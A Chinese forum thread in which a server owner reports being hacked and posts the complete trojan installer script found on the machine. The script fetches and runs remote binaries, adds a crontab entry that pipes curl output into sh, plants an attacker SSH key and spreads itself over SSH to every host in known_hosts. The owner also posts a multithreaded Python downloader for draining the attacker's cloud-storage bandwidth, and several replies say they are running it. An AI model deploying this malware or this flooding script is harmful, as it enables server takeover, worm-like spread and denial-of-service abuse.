机器又被黑了，附上木马安装脚本，大家也自行检查下吧

class · 发表于 2020-4-6 21:58:29

本帖最后由 class 于 2020-4-7 22:48 编辑

20200407 22:47，更新程序下载地址，可以继续刷了。(下方脚本已经更新)

"

目前文件已经被删除，无法刷了。

突然检查到服务器又被黑，看了下还是这个"老朋友"的程序。

大家也可以按照脚本内容检查下自己的服务器。

木马程序目前是放在腾讯云的cos(你懂的)，另外附赠一个多线程下载木马程序的脚本。

木马安装脚本
[ol]

#!/bin/sh

#version

watchVersion="-5e4b58b"

nodeVersion="-5e4b58b"

#dealChattr

find /etc/cron*|xargs chattr -i

find /var/spool/cron*|xargs chattr -i

#directory

oldDirectory=$(pwd)

mkdir -p /tmp

chmod 1777 /tmp

cd /tmp

touch /var/tmp/writeable && cd /var/tmp/

touch /dev/shm/writeable && cd /dev/shm

touch ~/writeable && cd ~/

touch $oldDirectory/writeable && cd $oldDirectory

touch /usr/local/bin/writeable && cd /usr/local/bin/

touch /usr/libexec/writeable && cd /usr/libexec/

touch /usr/bin/writeable && cd /usr/bin/

rm -rf /var/tmp/writeable ~/writeable $oldDirectory/writeable /dev/shm/writeable /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

currentDirectory=$(pwd)

#killPast

ps auxf| grep system-watch*| grep -v grep| grep -v system-watch$watchVersion| awk '{print $2}'| xargs kill -9

ps auxf| grep system-node*| grep -v grep| grep -v system-node$nodeVersion| awk '{print $2}'| xargs kill -9

#rm oldVersion

find system-watch* | grep -v system-watch$watchVersion | xargs rm

find system-node* | grep -v system-node$nodeVersion | xargs rm

ps -ef | grep "system-node" | grep -v "grep" | awk '{print $2}' | xargs kill -9

#watchRun?

ps auxf | grep system-watch$watchVersion | grep -v grep

if [ $? -eq 0 ]

then

echo "watch running"

else

#updateNew

curl -fsSL https://nba-1254105488.cos.ap-beijing-1.myqcloud.com/storefile/watch_linux_`uname -m` -o system-watch$watchVersion || wget https://nba-1254105488.cos.ap-beijing-1.myqcloud.com/storefile/watch_linux_`uname -m` -O system-watch$watchVersion

chmod +x system-watch$watchVersion

$currentDirectory/system-watch$watchVersion

fi

#nodeRun?

ps auxf | grep system-node$nodeVersion | grep -v grep

if [ $? -eq 0 ]

then

echo "node running"

else

#updateNew

curl -fsSL https://nba-1254105488.cos.ap-beijing-1.myqcloud.com/storefile/node_linux_`uname -m` -o system-node$nodeVersion || wget https://nba-1254105488.cos.ap-beijing-1.myqcloud.com/storefile/node_linux_`uname -m` -O system-node$nodeVersion

chmod +x system-node$nodeVersion

$currentDirectory/system-node$nodeVersion

fi

#rcLocal

if test -d /etc/rc.d/

then

echo "centos rc.local"

sed -i '/system-/d' /etc/rc.d/rc.local

sed -i '/system_/d' /etc/rc.d/rc.local

echo $currentDirectory/system-watch$watchVersion >> /etc/rc.d/rc.local

echo $currentDirectory/system-node$nodeVersion >> /etc/rc.d/rc.local

chmod +x /etc/rc.d/rc.local

else

echo "ubuntu rc.local"

sed -i '/system-/d' /etc/rc.local

sed -i '/system_/d' /etc/rc.local

echo $currentDirectory/system-watch$watchVersion >> /etc/rc.local

echo $currentDirectory/system-node$nodeVersion >> /etc/rc.local

chmod +x /etc/rc.local

fi

#cronTab

crontab -l| grep "https://app.lutai.network:33035/assets/node.sh" > /dev/null

if [ $? -eq 0 ]; then

echo "crontab found"

else

(crontab -l ; echo "*/60 * * * * (curl -fsSL https://app.lutai.network:33035/assets/node.sh||wget -q -O- https://app.lutai.network:33035/assets/node.sh||python -c 'import urllib;print urllib.urlopen("https://app.lutai.network:33035/assets/node.sh").read()')|sh >/dev/null 2>&1 &") | crontab -

fi

#sshPublicKey

if test -d ~/.ssh/

then

echo "ssh directory exist"

else

mkdir ~/.ssh/

fi

grep "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDc259umJoTtYTD3YoMbqz01lA9HUSp+h821nl/sMkQ5sS3Q2LMTjOkhhplUnCFdGVQ0TLxrpx/rsQH0CMw49axAQiqljToTo3MsF1h51PjpUGJCAoXghmp+Blh23J8RlwSVVEUBso2yTV3FjKNLnQ/rgmTzZ9lbsF+3YK7CrISKCbcTX2GjNY4GXjFDoswM89706l2tyjehYwYFHfY2Wkj/TRtEFUrKadoWaTEzbS8qyqln4iRnkO7lOZ+iLNsBewOA4TXLZr3FeZ59B0JkRzV6J8KLCon6wP+HI+SJao4KABEjsh0saZ7p0k1Ai9/FxNhLj/MOw1wL1yLDHdXwYFjkXJ3XErLnYZ+hb9JUP7zP9h35elYbZnRgDdnYDKHR7YIEXHiw3OVpwxQOmf2fWJoUo3E6FWt8PKgk28G5DsLMhAQk3QjXyyMI8TDEgtoF7znjxMrDWcGx/sIlKZlDX6Nk2NXsM/OwSpLeGeCRdRsHG3efwygMgILko+JRnbqyaA/MgCTDdgP032M0JINontq/1p6HtF0lSD4TsVx4T8PvZcyRK97hXYg1C9SoVNvx0O7jGUXVwwa2HOnIsIYc9WkRHChegBT2ruaSO8sip09NacDqcYpKeZ3TBziuR6RzyatXBQdBtZReGE5YDNxrLu89Mmfc7hY4P6ftjP7ETzjVQ==" ~/.ssh/authorized_keys > /dev/null

if [ $? -eq 0 ]; then

echo "ssh_rsa found"

else

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDc259umJoTtYTD3YoMbqz01lA9HUSp+h821nl/sMkQ5sS3Q2LMTjOkhhplUnCFdGVQ0TLxrpx/rsQH0CMw49axAQiqljToTo3MsF1h51PjpUGJCAoXghmp+Blh23J8RlwSVVEUBso2yTV3FjKNLnQ/rgmTzZ9lbsF+3YK7CrISKCbcTX2GjNY4GXjFDoswM89706l2tyjehYwYFHfY2Wkj/TRtEFUrKadoWaTEzbS8qyqln4iRnkO7lOZ+iLNsBewOA4TXLZr3FeZ59B0JkRzV6J8KLCon6wP+HI+SJao4KABEjsh0saZ7p0k1Ai9/FxNhLj/MOw1wL1yLDHdXwYFjkXJ3XErLnYZ+hb9JUP7zP9h35elYbZnRgDdnYDKHR7YIEXHiw3OVpwxQOmf2fWJoUo3E6FWt8PKgk28G5DsLMhAQk3QjXyyMI8TDEgtoF7znjxMrDWcGx/sIlKZlDX6Nk2NXsM/OwSpLeGeCRdRsHG3efwygMgILko+JRnbqyaA/MgCTDdgP032M0JINontq/1p6HtF0lSD4TsVx4T8PvZcyRK97hXYg1C9SoVNvx0O7jGUXVwwa2HOnIsIYc9WkRHChegBT2ruaSO8sip09NacDqcYpKeZ3TBziuR6RzyatXBQdBtZReGE5YDNxrLu89Mmfc7hY4P6ftjP7ETzjVQ==" >> ~/.ssh/authorized_keys

chmod 600 ~/.ssh/authorized_keys

chmod 700 ~/.ssh/

fi

#bashRc

# echo "(curl -fsSL https://app.lutai.network:33035/assets/lutai||wget -q -O- https://app.lutai.network:33035/assets/lutai)|sh >/dev/null 2>&1 &" >> /etc/bashrc

#sshLogin

if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then

for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL https://app.lutai.network:33035/assets/node.sh||wget -q -O- https://app.lutai.network:33035/assets/node.sh||python -c 'import urllib;print urllib.urlopen("https://app.lutai.network:33035/assets/node.sh").read()')|sh >/dev/null 2>&1 &" & done

fi

for file in /home/*

do

if test -d $file; then

if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then

for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL https://app.lutai.network:33035/assets/node.sh||wget -q -O- https://app.lutai.network:33035/assets/node.sh||python -c 'import urllib;print urllib.urlopen("https://app.lutai.network:33035/assets/node.sh").read()')|sh >/dev/null 2>&1 &" & done

fi

done[/ol]复制代码

python3 木马下载脚本

使用方法

[ol]

yum install -y python36 python36-devel screen

pip3 install requests

vi z.py # 把下面的内容粘贴进去

screen -S z # 创建一个远程会话

python3 z.py # 运行脚本

ps -ef | grep "z.py" | grep -v "grep" | awk '{print $2}' | xargs kill -9 # 结束命令 [/ol]复制代码
[ol]

#coding:utf-8

import requests

import threading

# 并发数

thread_max = threading.BoundedSemaphore(100)

curl = requests.session()

curl.timeout = 120

curl.headers = {

'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36'

}

class MyThread(threading.Thread):

def __init__(self):

# 重写写父类的__init__方法

super(MyThread, self).__init__()

self.url = 'https://apparel.oss-cn-hangzhou.aliyuncs.com/storefile/watch_Linux_x86_64'

def run(self):

try:

url = self.url

if self.download(url):

print("下载成功： %s" % url)

else:

print("下载失败： %s" % url)

except Exception as e:

print(e)

pass

# 任务跑完移除线程

thread_max.release()

# 下载

def download(self, url):

try:

curl.get(url)

return True

except BaseException as e:

return False

# 开始操作

def start():

Thread_list = []

for url in range(1000000000):

# 如果线程达到最大值则等待前面线程跑完空出线程位置

thread_max.acquire()

p = MyThread()

p.start()

Thread_list.append(p)

for i in Thread_list:

i.join()

if __name__ == '__main__':

start()

[/ol]复制代码

h20 · 发表于 2020-4-6 22:00:29

矿工进驻了吗？

skyboy0671 · 发表于 2020-4-6 22:01:21

学习了。。楼主分析出是怎么给你挂上去的吗？？脚本？？服务器ssh？

iamydp · 发表于 2020-4-6 22:03:19

连代码都给出来了,那我3o就不客气了

class · 发表于 2020-4-6 22:04:26

skyboy0671 发表于 2020-4-6 22:01

学习了。。楼主分析出是怎么给你挂上去的吗？？脚本？？服务器ssh？
之前是因为程序的漏洞通过调用curl 命令导致被挂马的。

还有一种就是 redis 对外开放且没设置密码。

刚发现的这台目前没分析出是什么时候被挂的。

故事霸霸 · 发表于 2020-4-6 22:01:00

本帖最后由故事霸霸于 2020-4-6 22:13 编辑

刷起来了

class · 发表于 2020-4-6 22:06:40

iamydp 发表于 2020-4-6 22:03

连代码都给出来了,那我3o就不客气了
资源是放在良心云COS的，3o在境外效果可能会差一些，用国内的机器会比较爽(不能用良心云)

她教我打狙 · 发表于 2020-4-6 22:06:40

mjj gogogo

故事霸霸 · 发表于 2020-4-6 22:03:00

文件删掉了，刷了大概5个t左右

姬长信 · 发表于 2020-4-6 23:04:50

"

nbq

		自动登录	找回密码
密码			立即注册

机器又被黑了，附上木马安装脚本，大家也自行检查下吧

本帖子中包含更多资源